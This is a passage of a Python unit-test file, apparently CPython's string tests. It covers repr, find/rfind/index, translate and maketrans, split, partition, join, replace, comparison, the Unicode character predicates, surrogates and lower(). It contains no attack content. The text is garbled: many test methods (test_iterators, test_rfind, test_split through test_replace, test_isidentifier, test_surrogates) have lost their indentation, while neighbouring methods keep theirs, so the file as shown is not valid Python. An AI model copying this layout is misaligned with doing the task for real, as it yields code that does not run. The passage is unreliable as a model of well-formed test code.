            # Test basic sanity of repr()
            self.assertEqual(repr('abc'), "'abc'")
            self.assertEqual(repr('ab\\c'), "'ab\\\\c'")
            self.assertEqual(repr('ab\\'), "'ab\\\\'")
            self.assertEqual(repr('\\c'), "'\\\\c'")
            self.assertEqual(repr('\\'), "'\\\\'")
            self.assertEqual(repr('\n'), "'\\n'")
            self.assertEqual(repr('\r'), "'\\r'")
            self.assertEqual(repr('\t'), "'\\t'")
            self.assertEqual(repr('\b'), "'\\x08'")
            self.assertEqual(repr("'\""), """'\\'"'""")
            self.assertEqual(repr("'\""), """'\\'"'""")
            self.assertEqual(repr("'"), '''"'"''')
            self.assertEqual(repr('"'), """'"'""")
            latin1repr = (
                "'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
                "\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
                "\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
                "JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
                "\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
                "\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
                "\\x9c\\x9d\\x9e\\x9f\\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9"
                "\xaa\xab\xac\\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
                "\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
                "\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3"
                "\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
                "\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
                "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd"
                "\xfe\xff'")
            testrepr = repr(''.join(map(chr, range(256))))
            self.assertEqual(testrepr, latin1repr)
            # Test repr works on wide unicode escapes without overflow.
            self.assertEqual(repr("\U00010000" * 39 + "\uffff" * 4096),
                             repr("\U00010000" * 39 + "\uffff" * 4096))
            class WrongRepr:
                def __repr__(self):
                    return b'byte-repr'
            self.assertRaises(TypeError, repr, WrongRepr())
def test_iterators(self):
# Make sure unicode objects have an __iter__ method
it = "\u1111\u2222\u3333".__iter__()
self.assertEqual(next(it), "\u1111")
self.assertEqual(next(it), "\u2222")
self.assertEqual(next(it), "\u3333")
self.assertRaises(StopIteration, next, it)
    def test_count(self):
        """str.count: shared cases, negative indices, and mixed PEP 393 kinds."""
        string_tests.CommonTest.test_count(self)
        # check mixed argument types
        self.checkequalnofix(3, 'aaa', 'count', 'a')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(3, 'aaa', 'count', 'a')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(1, 'aaa', 'count', 'a', -1)
        self.checkequalnofix(3, 'aaa', 'count', 'a', -10)
        self.checkequalnofix(2, 'aaa', 'count', 'a', 0, -1)
        self.checkequalnofix(0, 'aaa', 'count', 'a', 0, -10)
        # test mixed kinds (1/2/4-byte internal representations)
        self.checkequal(10, '\u0102' + 'a' * 10, 'count', 'a')
        self.checkequal(10, '\U00100304' + 'a' * 10, 'count', 'a')
        self.checkequal(10, '\U00100304' + '\u0102' * 10, 'count', '\u0102')
        self.checkequal(0, 'a' * 10, 'count', '\u0102')
        self.checkequal(0, 'a' * 10, 'count', '\U00100304')
        self.checkequal(0, '\u0102' * 10, 'count', '\U00100304')
        self.checkequal(10, '\u0102' + 'a_' * 10, 'count', 'a_')
        self.checkequal(10, '\U00100304' + 'a_' * 10, 'count', 'a_')
        self.checkequal(10, '\U00100304' + '\u0102_' * 10, 'count', '\u0102_')
        self.checkequal(0, 'a' * 10, 'count', 'a\u0102')
        self.checkequal(0, 'a' * 10, 'count', 'a\U00100304')
        self.checkequal(0, '\u0102' * 10, 'count', '\u0102\U00100304')
    def test_find(self):
        """str.find: memchr fast path, argument types, mixed PEP 393 kinds."""
        string_tests.CommonTest.test_find(self)
        # test implementation details of the memchr fast path
        self.checkequal(100, 'a' * 100 + '\u0102', 'find', '\u0102')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0201')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0120')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0220')
        self.checkequal(100, 'a' * 100 + '\U00100304', 'find', '\U00100304')
        self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00100204')
        self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00102004')
        # check mixed argument types
        self.checkequalnofix(0,  'abcdefghiabc', 'find', 'abc')
        self.checkequalnofix(9,  'abcdefghiabc', 'find', 'abc', 1)
        self.checkequalnofix(-1, 'abcdefghiabc', 'find', 'def', 4)
        self.assertRaises(TypeError, 'hello'.find)
        self.assertRaises(TypeError, 'hello'.find, 42)
        # test mixed kinds (1/2/4-byte internal representations)
        self.checkequal(100, '\u0102' * 100 + 'a', 'find', 'a')
        self.checkequal(100, '\U00100304' * 100 + 'a', 'find', 'a')
        self.checkequal(100, '\U00100304' * 100 + '\u0102', 'find', '\u0102')
        self.checkequal(-1, 'a' * 100, 'find', '\u0102')
        self.checkequal(-1, 'a' * 100, 'find', '\U00100304')
        self.checkequal(-1, '\u0102' * 100, 'find', '\U00100304')
        self.checkequal(100, '\u0102' * 100 + 'a_', 'find', 'a_')
        self.checkequal(100, '\U00100304' * 100 + 'a_', 'find', 'a_')
        self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'find', '\u0102_')
        self.checkequal(-1, 'a' * 100, 'find', 'a\u0102')
        self.checkequal(-1, 'a' * 100, 'find', 'a\U00100304')
        self.checkequal(-1, '\u0102' * 100, 'find', '\u0102\U00100304')
def test_rfind(self):
string_tests.CommonTest.test_rfind(self)
# test implementation details of the memrchr fast path
self.checkequal(0, '\u0102' + 'a' * 100 , 'rfind', '\u0102')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0201')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0120')
self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0220')
self.checkequal(0, '\U00100304' + 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00100204')
self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00102004')
# check mixed argument types
self.checkequalnofix(9, 'abcdefghiabc', 'rfind', 'abc')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
# test mixed kinds
self.checkequal(0, 'a' + '\u0102' * 100, 'rfind', 'a')
self.checkequal(0, 'a' + '\U00100304' * 100, 'rfind', 'a')
self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304')
self.checkequal(0, '_a' + '\u0102' * 100, 'rfind', '_a')
self.checkequal(0, '_a' + '\U00100304' * 100, 'rfind', '_a')
self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rfind', '_\u0102')
self.checkequal(-1, 'a' * 100, 'rfind', '\u0102a')
self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304a')
self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304\u0102')
    def test_index(self):
        """str.index: like find(), but a missing substring raises ValueError."""
        string_tests.CommonTest.test_index(self)
        self.checkequalnofix(0, 'abcdefghiabc', 'index', '')
        self.checkequalnofix(3, 'abcdefghiabc', 'index', 'def')
        self.checkequalnofix(0, 'abcdefghiabc', 'index', 'abc')
        self.checkequalnofix(9, 'abcdefghiabc', 'index', 'abc', 1)
        # start/end bounds exclude the match -> ValueError
        self.assertRaises(ValueError, 'abcdefghiabc'.index, 'hib')
        self.assertRaises(ValueError, 'abcdefghiab'.index, 'abc', 1)
        self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', 8)
        self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', -1)
        # test mixed kinds: a needle narrower than the haystack kind is found,
        # a needle containing a wider char than any haystack char never is
        self.checkequal(100, '\u0102' * 100 + 'a', 'index', 'a')
        self.checkequal(100, '\U00100304' * 100 + 'a', 'index', 'a')
        self.checkequal(100, '\U00100304' * 100 + '\u0102', 'index', '\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, '\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, '\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).index, '\U00100304')
        self.checkequal(100, '\u0102' * 100 + 'a_', 'index', 'a_')
        self.checkequal(100, '\U00100304' * 100 + 'a_', 'index', 'a_')
        self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'index', '\u0102_')
        self.assertRaises(ValueError, ('a' * 100).index, 'a\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, 'a\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).index, '\u0102\U00100304')
    def test_rindex(self):
        """str.rindex: like rfind(), but a missing substring raises ValueError."""
        string_tests.CommonTest.test_rindex(self)
        # an empty needle matches at the very end of the string
        self.checkequalnofix(12, 'abcdefghiabc', 'rindex', '')
        self.checkequalnofix(3, 'abcdefghiabc', 'rindex', 'def')
        self.checkequalnofix(9, 'abcdefghiabc', 'rindex', 'abc')
        self.checkequalnofix(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
        # start/end bounds exclude the match -> ValueError
        self.assertRaises(ValueError, 'abcdefghiabc'.rindex, 'hib')
        self.assertRaises(ValueError, 'defghiabc'.rindex, 'def', 1)
        self.assertRaises(ValueError, 'defghiabc'.rindex, 'abc', 0, -1)
        self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, 8)
        self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, -1)
        # test mixed kinds (see test_index for the rationale)
        self.checkequal(0, 'a' + '\u0102' * 100, 'rindex', 'a')
        self.checkequal(0, 'a' + '\U00100304' * 100, 'rindex', 'a')
        self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rindex', '\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304')
        self.checkequal(0, '_a' + '\u0102' * 100, 'rindex', '_a')
        self.checkequal(0, '_a' + '\U00100304' * 100, 'rindex', '_a')
        self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rindex', '_\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102a')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304a')
        self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304\u0102')
    def test_maketrans_translate(self):
        """str.translate with raw mappings and tables built by str.maketrans.

        Covers: codepoint->None (delete), codepoint->codepoint,
        codepoint->str replacement, the two maketrans() calling conventions,
        ASCII/latin1 kind switches, and rejection of invalid tables.
        """
        # these work with plain translate()
        self.checkequalnofix('bbbc', 'abababc', 'translate',
                             {ord('a'): None})
        self.checkequalnofix('iiic', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ord('i')})
        self.checkequalnofix('iiix', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ord('i'), ord('c'): 'x'})
        self.checkequalnofix('c', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ''})
        self.checkequalnofix('xyyx', 'xzx', 'translate',
                             {ord('z'): 'yy'})
        # this needs maketrans(): str keys are not looked up by translate(),
        # so the mapping below is a no-op without conversion
        self.checkequalnofix('abababc', 'abababc', 'translate',
                             {'b': '<i>'})
        tbl = self.type2test.maketrans({'a': None, 'b': '<i>'})
        self.checkequalnofix('<i><i><i>c', 'abababc', 'translate', tbl)
        # test alternative way of calling maketrans()
        tbl = self.type2test.maketrans('abc', 'xyz', 'd')
        self.checkequalnofix('xyzzy', 'abdcdcbdddd', 'translate', tbl)
        # various tests switching from ASCII to latin1 or the opposite;
        # same length, remove a letter, or replace with a longer string.
        self.assertEqual("[a]".translate(str.maketrans('a', 'X')),
                         "[X]")
        self.assertEqual("[a]".translate(str.maketrans({'a': 'X'})),
                         "[X]")
        self.assertEqual("[a]".translate(str.maketrans({'a': None})),
                         "[]")
        self.assertEqual("[a]".translate(str.maketrans({'a': 'XXX'})),
                         "[XXX]")
        self.assertEqual("[a]".translate(str.maketrans({'a': '\xe9'})),
                         "[\xe9]")
        self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '123'})),
                         "x123")
        self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '\xe9'})),
                         "x\xe9")
        # test non-ASCII (don't take the fast-path)
        self.assertEqual("[a]".translate(str.maketrans({'a': '<\xe9>'})),
                         "[<\xe9>]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': 'a'})),
                         "[a]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': None})),
                         "[]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': '123'})),
                         "[123]")
        self.assertEqual("[a\xe9]".translate(str.maketrans({'a': '<\u20ac>'})),
                         "[<\u20ac>\xe9]")
        # replacement outside the valid codepoint range must raise
        invalid_char = 0x10ffff+1
        for before in "a\xe9\u20ac\U0010ffff":
            mapping = str.maketrans({before: invalid_char})
            text = "[%s]" % before
            self.assertRaises(ValueError, text.translate, mapping)
        # malformed maketrans() arguments
        self.assertRaises(TypeError, self.type2test.maketrans)
        self.assertRaises(ValueError, self.type2test.maketrans, 'abc', 'defg')
        self.assertRaises(TypeError, self.type2test.maketrans, 2, 'def')
        self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 2)
        self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 'def', 2)
        self.assertRaises(ValueError, self.type2test.maketrans, {'xy': 2})
        self.assertRaises(TypeError, self.type2test.maketrans, {(1,): 2})
        self.assertRaises(TypeError, 'hello'.translate)
        self.assertRaises(TypeError, 'abababc'.translate, 'abc', 'xyz')
def test_split(self):
string_tests.CommonTest.test_split(self)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'split', delim)
self.checkequal([left, right],
left + delim + right, 'split', delim)
self.checkequal([left + right],
left + right, 'split', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'split', delim *2)
def test_rsplit(self):
string_tests.CommonTest.test_rsplit(self)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'rsplit', delim)
self.checkequal([left, right],
left + delim + right, 'rsplit', delim)
self.checkequal([left + right],
left + right, 'rsplit', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'rsplit', delim *2)
def test_partition(self):
string_tests.MixinStrUnicodeUserStringTest.test_partition(self)
self.checkequal(('ABCDEFGH', '', ''), 'ABCDEFGH', 'partition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal((left + right, '', ''),
left + right, 'partition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'partition', delim)
self.checkequal((left + right, '', ''),
left + right, 'partition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'partition', delim * 2)
def test_rpartition(self):
string_tests.MixinStrUnicodeUserStringTest.test_rpartition(self)
self.checkequal(('', '', 'ABCDEFGH'), 'ABCDEFGH', 'rpartition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'rpartition', delim)
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'rpartition', delim * 2)
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
class MyWrapper:
def __init__(self, sval): self.sval = sval
def __str__(self): return self.sval
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkraises(TypeError, ' ', 'join', ['1', '2', MyWrapper('foo')])
self.checkraises(TypeError, ' ', 'join', ['1', '2', '3', bytes()])
self.checkraises(TypeError, ' ', 'join', [1, 2, 3])
self.checkraises(TypeError, ' ', 'join', ['1', '2', 3])
@unittest.skipIf(sys.maxsize > 2**32,
'needs too much memory on a 64-bit platform')
def test_join_overflow(self):
size = int(sys.maxsize**0.5) + 1
seq = ('A' * size,) * size
self.assertRaises(OverflowError, ''.join, seq)
def test_replace(self):
string_tests.CommonTest.test_replace(self)
self.checkequalnofix('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.assertRaises(TypeError, 'replace'.replace, "r", 42)
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
for repl in ('d', '\u0103', '\U00010303'):
self.checkequal(left + right,
left + right, 'replace', delim, repl)
self.checkequal(left + repl + right,
left + delim + right,
'replace', delim, repl)
self.checkequal(left + right,
left + right, 'replace', delim * 2, repl)
self.checkequal(left + repl + right,
left + delim * 2 + right,
'replace', delim * 2, repl)
@support.cpython_only
def test_replace_id(self):
pattern = 'abc'
text = 'abc def'
self.assertIs(text.replace(pattern, pattern), text)
def test_bytes_comparison(self):
with support.check_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertEqual('abc' == b'abc', False)
self.assertEqual('abc' != b'abc', True)
self.assertEqual('abc' == bytearray(b'abc'), False)
self.assertEqual('abc' != bytearray(b'abc'), True)
    def test_comparison(self):
        """Rich comparison of strings, including lone/paired surrogates."""
        self.assertEqual('abc', 'abc')
        self.assertTrue('abcd' > 'abc')
        self.assertTrue('abc' < 'abcd')
        # The whole block below is intentionally disabled: it encodes UTF-16
        # code-unit ordering assumptions that str comparison does not follow.
        if 0:
            self.assertTrue('\u0061' < '\u20ac')
            self.assertTrue('\u0061' < '\ud800\udc02')
            def test_lecmp(s, s2):
                self.assertTrue(s < s2)
            def test_fixup(s):
                # compare s against surrogate pairs with varying halves
                s2 = '\ud800\udc01'
                test_lecmp(s, s2)
                s2 = '\ud900\udc01'
                test_lecmp(s, s2)
                s2 = '\uda00\udc01'
                test_lecmp(s, s2)
                s2 = '\udb00\udc01'
                test_lecmp(s, s2)
                s2 = '\ud800\udd01'
                test_lecmp(s, s2)
                s2 = '\ud900\udd01'
                test_lecmp(s, s2)
                s2 = '\uda00\udd01'
                test_lecmp(s, s2)
                s2 = '\udb00\udd01'
                test_lecmp(s, s2)
                s2 = '\ud800\ude01'
                test_lecmp(s, s2)
                s2 = '\ud900\ude01'
                test_lecmp(s, s2)
                s2 = '\uda00\ude01'
                test_lecmp(s, s2)
                s2 = '\udb00\ude01'
                test_lecmp(s, s2)
                s2 = '\ud800\udfff'
                test_lecmp(s, s2)
                s2 = '\ud900\udfff'
                test_lecmp(s, s2)
                s2 = '\uda00\udfff'
                test_lecmp(s, s2)
                s2 = '\udb00\udfff'
                test_lecmp(s, s2)
            test_fixup('\ue000')
            test_fixup('\uff61')
        # surrogate codepoints compare like any other codepoints
        self.assertTrue('\ud800\udc02' < '\ud84d\udc56')
    def test_islower(self):
        """str.islower for Roman numerals and non-BMP characters."""
        super().test_islower()
        self.checkequalnofix(False, '\u1FFc', 'islower')
        # Roman numerals: capital form is not lower, small form is
        self.assertFalse('\u2167'.islower())
        self.assertTrue('\u2177'.islower())
        # non-BMP, uppercase
        self.assertFalse('\U00010401'.islower())
        self.assertFalse('\U00010427'.islower())
        # non-BMP, lowercase
        self.assertTrue('\U00010429'.islower())
        self.assertTrue('\U0001044E'.islower())
        # non-BMP, uncased
        self.assertFalse('\U0001F40D'.islower())
        self.assertFalse('\U0001F46F'.islower())
    def test_isupper(self):
        """str.isupper for Roman numerals and non-BMP characters."""
        super().test_isupper()
        if not sys.platform.startswith('java'):
            # titlecase letter (istitle() is True for it): not uppercase
            self.checkequalnofix(False, '\u1FFc', 'isupper')
        # Roman numerals: capital form is upper, small form is not
        self.assertTrue('\u2167'.isupper())
        self.assertFalse('\u2177'.isupper())
        # non-BMP, uppercase
        self.assertTrue('\U00010401'.isupper())
        self.assertTrue('\U00010427'.isupper())
        # non-BMP, lowercase
        self.assertFalse('\U00010429'.isupper())
        self.assertFalse('\U0001044E'.isupper())
        # non-BMP, uncased
        self.assertFalse('\U0001F40D'.isupper())
        self.assertFalse('\U0001F46F'.isupper())
    def test_istitle(self):
        """str.istitle with titlecase characters and non-BMP cased letters."""
        super().test_istitle()
        self.checkequalnofix(True, '\u1FFc', 'istitle')
        self.checkequalnofix(True, 'Greek \u1FFcitlecases ...', 'istitle')
        # non-BMP: uppercase letter followed by lowercase letter is titlecased
        self.assertTrue('\U00010401\U00010429'.istitle())
        self.assertTrue('\U00010427\U0001044E'.istitle())
        # lone lowercase or uncased non-BMP characters are not
        for ch in ['\U00010429', '\U0001044E', '\U0001F40D', '\U0001F46F']:
            self.assertFalse(ch.istitle(), '{!a} is not title'.format(ch))
    def test_isspace(self):
        """str.isspace for Unicode space separators; non-BMP chars are not space."""
        super().test_isspace()
        self.checkequalnofix(True, '\u2000', 'isspace')
        self.checkequalnofix(True, '\u200a', 'isspace')
        # EM DASH is punctuation, not whitespace
        self.checkequalnofix(False, '\u2014', 'isspace')
        for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
                   '\U0001F40D', '\U0001F46F']:
            self.assertFalse(ch.isspace(), '{!a} is not space.'.format(ch))
    def test_isalnum(self):
        """str.isalnum for non-BMP letters and digit characters."""
        super().test_isalnum()
        for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
                   '\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
            self.assertTrue(ch.isalnum(), '{!a} is alnum.'.format(ch))
    def test_isalpha(self):
        """str.isalpha for titlecase and non-BMP letters; symbols are not alpha."""
        super().test_isalpha()
        self.checkequalnofix(True, '\u1FFc', 'isalpha')
        # non-BMP cased letters are alphabetic...
        self.assertTrue('\U00010401'.isalpha())
        self.assertTrue('\U00010427'.isalpha())
        self.assertTrue('\U00010429'.isalpha())
        self.assertTrue('\U0001044E'.isalpha())
        # ...but these non-BMP symbols are not
        self.assertFalse('\U0001F40D'.isalpha())
        self.assertFalse('\U0001F46F'.isalpha())
    def test_isdecimal(self):
        """str.isdecimal: strictest of the three numeric predicates."""
        self.checkequalnofix(False, '', 'isdecimal')
        self.checkequalnofix(False, 'a', 'isdecimal')
        self.checkequalnofix(True, '0', 'isdecimal')
        # circled digit: isdigit() but not isdecimal() (cf. test_isdigit)
        self.checkequalnofix(False, '\u2460', 'isdecimal')
        # vulgar fraction: isnumeric() only (cf. test_isnumeric)
        self.checkequalnofix(False, '\xbc', 'isdecimal')
        # ARABIC-INDIC digit
        self.checkequalnofix(True, '\u0660', 'isdecimal')
        self.checkequalnofix(True, '0123456789', 'isdecimal')
        self.checkequalnofix(False, '0123456789a', 'isdecimal')
        # extra positional argument is rejected
        self.checkraises(TypeError, 'abc', 'isdecimal', 42)
        for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
                   '\U0001F40D', '\U0001F46F', '\U00011065', '\U0001F107']:
            self.assertFalse(ch.isdecimal(), '{!a} is not decimal.'.format(ch))
        for ch in ['\U0001D7F6', '\U00011066', '\U000104A0']:
            self.assertTrue(ch.isdecimal(), '{!a} is decimal.'.format(ch))
    def test_isdigit(self):
        """str.isdigit: broader than isdecimal, narrower than isnumeric."""
        super().test_isdigit()
        # circled digit: digit but not decimal (cf. test_isdecimal)
        self.checkequalnofix(True, '\u2460', 'isdigit')
        # vulgar fraction: numeric only (cf. test_isnumeric)
        self.checkequalnofix(False, '\xbc', 'isdigit')
        # ARABIC-INDIC digit
        self.checkequalnofix(True, '\u0660', 'isdigit')
        for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
                   '\U0001F40D', '\U0001F46F', '\U00011065']:
            self.assertFalse(ch.isdigit(), '{!a} is not a digit.'.format(ch))
        for ch in ['\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
            self.assertTrue(ch.isdigit(), '{!a} is a digit.'.format(ch))
    def test_isnumeric(self):
        """str.isnumeric: broadest of the three numeric predicates."""
        self.checkequalnofix(False, '', 'isnumeric')
        self.checkequalnofix(False, 'a', 'isnumeric')
        self.checkequalnofix(True, '0', 'isnumeric')
        # circled digit and vulgar fraction both count as numeric
        self.checkequalnofix(True, '\u2460', 'isnumeric')
        self.checkequalnofix(True, '\xbc', 'isnumeric')
        # ARABIC-INDIC digit
        self.checkequalnofix(True, '\u0660', 'isnumeric')
        self.checkequalnofix(True, '0123456789', 'isnumeric')
        self.checkequalnofix(False, '0123456789a', 'isnumeric')
        # extra positional argument is rejected
        self.assertRaises(TypeError, "abc".isnumeric, 42)
        for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
                   '\U0001F40D', '\U0001F46F']:
            self.assertFalse(ch.isnumeric(), '{!a} is not numeric.'.format(ch))
        for ch in ['\U00011065', '\U0001D7F6', '\U00011066',
                   '\U000104A0', '\U0001F107']:
            self.assertTrue(ch.isnumeric(), '{!a} is numeric.'.format(ch))
def test_isidentifier(self):
self.assertTrue("a".isidentifier())
self.assertTrue("Z".isidentifier())
self.assertTrue("_".isidentifier())
self.assertTrue("b0".isidentifier())
self.assertTrue("bc".isidentifier())
self.assertTrue("b_".isidentifier())
self.assertTrue("µ".isidentifier())
self.assertTrue("𝔘𝔫𝔦𝔠𝔬𝔡𝔢".isidentifier())
self.assertFalse(" ".isidentifier())
self.assertFalse("[".isidentifier())
self.assertFalse("©".isidentifier())
self.assertFalse("0".isidentifier())
def test_isprintable(self):
self.assertTrue("".isprintable())
self.assertTrue(" ".isprintable())
self.assertTrue("abcdefg".isprintable())
self.assertFalse("abcdefg\n".isprintable())
self.assertTrue("\u0374".isprintable())
self.assertFalse("\u0378".isprintable())
self.assertFalse("\ud800".isprintable())
self.assertTrue('\U0001F46F'.isprintable())
self.assertFalse('\U000E0020'.isprintable())
def test_surrogates(self):
for s in ('a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertTrue(s.islower())
self.assertFalse(s.isupper())
self.assertFalse(s.istitle())
for s in ('A\uD800B\uDFFF', 'A\uDFFFB\uD800',
'A\uD800B\uDFFFA', 'A\uDFFFB\uD800A'):
self.assertFalse(s.islower())
self.assertTrue(s.isupper())
self.assertTrue(s.istitle())
for meth_name in ('islower', 'isupper', 'istitle'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
for meth_name in ('isalpha', 'isalnum', 'isdigit', 'isspace',
'isdecimal', 'isnumeric',
'isidentifier', 'isprintable'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF',
'a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
    def test_lower(self):
        """str.lower: non-BMP mappings and Unicode special casing."""
        string_tests.CommonTest.test_lower(self)
        self.assertEqual('\U00010427'.lower(), '\U0001044F')
        self.assertEqual('\U00010427\U00010427'.lower(),
                         '\U0001044F\U0001044F')
        self.assertEqual('\U00010427\U0001044F'.lower(),
                         '\U0001044F\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.lower(),
                         'x\U0001044Fx\U0001044F')
        self.assertEqual('fi'.lower(), 'fi')
        # U+0130 (capital I with dot above) lowers to a two-char sequence
        self.assertEqual('\u0130'.lower(), '\u0069\u0307')
        # capital sigma lowers to final sigma (\u03c2) only at word end
        self.assertEqual('\u03a3'.lower(), '\u03c3')
        self.assertEqual('\u0345\u03a3'.lower(), '\u0345\u03c3')
        self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
        self.assertEqual('A\u0345\u03a3a'.lower(), 'a\u0345\u03c3a')
        self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
        self.assertEqual('A\u03a3\u0345'.lower(), 'a\u03c2\u0345')
